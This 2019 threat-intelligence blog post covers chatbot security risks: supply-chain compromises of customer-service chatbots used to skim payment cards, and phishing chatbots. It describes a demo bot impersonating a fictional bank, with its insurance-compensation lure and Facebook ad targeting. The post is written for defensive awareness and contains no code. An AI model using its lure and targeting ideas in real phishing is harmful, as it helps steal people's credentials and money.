Wednesday 29th May 2019

Hasta la Visa, baby: chatbots gone rogue

By Jamie MacColl

In this blogpost, we unpack the cyber threats associated with a key emerging technology – the chatbot. A chatbot is a program that interacts with people via an instant messaging or audio interface, typically used for customer service purposes. While chatbots are expected to bring huge benefits, businesses should be aware of their potential to be targeted by cybercriminals. Chatbots have proven to be a weak link in the supply chain, and can be targeted and leveraged in innovative phishing campaigns.

What is a chatbot?

A chatbot is a program that interacts with people via an instant messaging or audio interface. It is powered either by machine learning, or, more frequently, driven using intelligent rules. In short, some chatbots are smarter and more capable than others. A chatbot can take the form of a layer on top of a service – for instance, a customer service chatbot on a website; alternatively, it might be a gateway to a service – for example, a digital marketing chatbot on a social media messenger platform that tries to attract customers to a particular website or product. While your average chatbot has not quite reached the sophistication of a HAL 9000 (of 2001: A Space Odyssey infamy), they can drastically reduce the cost of providing customer service, and allow for innovative means of attracting new customers.

Threats from the supply chain: compromising third-party customer service chatbots

If you have interacted with a customer service agent in recent years, there’s a high chance you were talking to a bot. This is because chatbots are increasingly an essential component of the online customer service experience. A 2017 Oracle survey suggests that 80% of organisations plan to use them by 2020.[1] Cybercriminals that are alert to new possibilities have also noted this trend. This year, Orpheus’ intelligence reporting has highlighted cybercriminals intent and capability to compromise third-party customer service chatbots as a means of stealing payment card data from large e-commerce sites.

In April, it emerged that cybercriminals stole personally identifiable information (PII) and financial data from hundreds of thousands of customers of Delta Airlines and US retailers Best Buy and Sears. All three companies revealed that the thefts occurred due to the use of compromised third-party customer service chatbots hosted by [24]7.ai.[2]

Two months later, Ticketmaster disclosed that it had suffered a similar breach of payment card data. A group using a technique known as Magecart had breached a third-party chatbot supplier, Inbenta, to enable them to inject a JavaScript-coded digital skimmed into Ticketmaster payment pages.

In both incidents, by targeting a third-party chatbot supplier, cybercriminals were able to steal a large volume of payment card data and bypass more sophisticated security measures that we would expect to find at large e-commerce sites. In this sense, customer service chatbots represent another target for enterprising threat actors seeking to exploit organisations’ supply chains, and we anticipate this technique will increase in line with the uptake of the technology.

Phishing chatbots

Looking ahead, chatbot technology also offers cybercriminals the opportunity to create more convincing phishing campaigns targeting individual victims’ credentials or PII. A chatbot able to respond to a variety of questions and prompts on an instant messenger platform will appear much more credible than the average phishing email. Chatbots might enable cybercriminals to distribute personalised phishing messages on a broad scale.

Security researchers have already documented chatbots mimicking individuals – fake profiles that usually include an avatar of an attractive woman – in campaigns directed against users of Tinder and Skype. From the phisher’s perspective, each conversation ideally ends with a love-struck individual providing their credentials or payment card details in the hope of a burgeoning relationship with the fake profile. Using chatbots helps cybercriminals carry out such campaigns on a much wider scale, as they do not need to manually operate each fake profile and respond to every message they receive.

We anticipate, however, that cybercriminals will also start impersonating companies’ chatbots built for social media messenger platforms. The graph below illustrates the increase in monthly active users (MAUs) on such apps. This is in part due to the increasing functionality of platforms like Facebook Messenger and WeChat – the latter has already integrated a variety of tools and third-party services to the extent that users can perform many of their daily tasks within the app.[4] This will present new opportunities for cybercriminal activity.

Slide 22 from Kleiner Perkins presentation ‘Internet Trends 2018’ found at: https://www.slideshare.net/kleinerperkins

A simulated phishing chatbot

As we have not seen a threat actor employ a phishing chatbot impersonating a brand in the wild, we have produced a demo video to show how one might work. We created the demo using an open-source tool that itself uses the Facebook Messenger platform. It is designed to mimic a fictional bank – “ABC Bank” – that has experienced months of IT failures and is seeking to improve its customer service. This will reflect banks’ increasing use of chatbots for customer service and account management, but also the cybercriminal tendency to deploy new TTPs against financial institutions before other sectors.

Our ABC Bank demo phishing bot is designed to encourage victims to part with their banking credentials in order to receive free travel insurance or phone insurance as compensation for recent IT problems at the bank. It attempts to gain victims’ trust through a conversational tone, links to legitimate ABC Bank pages (the “Read Full Details” button) and by playing on real-life events (the IT failures). A real version would end with a link to a credential phishing page, or may even try to steal account information directly throughout the chat.

Our phishing bot could be distributed via a variety of methods, but the most effective presently available would be to specifically target users that like or have interacted with ABC Bank on Facebook with paid adverts that include a link to the chatbot. Facebook’s struggles with policing malicious adverts and phishing links have been well documented. Facebook’s Customer Matching tool, which provides additional functionality for anyone with a Facebook developer account, may enable cybercriminals to further specify their targeting efforts. However, the shelf life of such a campaign will be shorter due to the greater prospect of it being detected. Alternatively, criminals could simply host chatbots on replica sites akin to those that host credential phishing pages, and redirect potential victims to them using phishing emails.

While our demo is unlikely to fool everyone, we believe it would be sufficiently effective to exploit enough victims to make it worthwhile. Crucially, chatbots are still a novelty, meaning consumers are not used to interacting with brands in this way. This might explain why research indicates the click-through rates on chatbots are significantly higher than for emails.[5] Although users are increasingly aware of the threat from phishing emails, public awareness of this new vector will be limited, increasing its likely effectiveness.

Furthermore, it is much easier to effectively mimic the branding of a bank on Facebook Messenger than it is in a phishing email. Finally, the barriers to entry are low: we created the bot in less than half an hour and a threat actor that is willing to invest more time and effort would likely be able to produce a very convincing phishing bot.

What can companies do in response?

Chatbots like these are likely to be a threat both to individual consumers, and to the reputations of brands that are unable to prevent their customers from becoming victims. However, these attack methods are not revolutionary and can be mitigated. Mitigation includes ensuring the security of your supply chain, avoiding embedding third-party scripts on payment pages, and above all, educating employees and consumers that phishing campaigns are innovative and not confined to email. As always, tried and tested security hygiene goes a long way to mitigate this evolving threat.

Jamie MacColl is an Orpheus researcher.


[1] https://www.oracle.com/uk/corporate/pressrelease/oracle-report-can-virtual-experiences-replace-reality-vr-chatbots-for-cx-20161206.html

[2] https://threatpost.com/delta-sears-breaches-blamed-on-malware-attack-against-a-third-party-chat-service/131023/

[4] https://qz.com/1167024/all-the-things-you-can-and-cant-do-with-your-wechat-account-in-china/

[5] https://www.searchenginejournal.com/facebook-messenger-chatbot-success/242477/

Get our latest cyber intelligence insights straight into your inbox

Fill out the short form below to subscribe to our newsletter so that you never miss out on our cyber intelligence insights and news.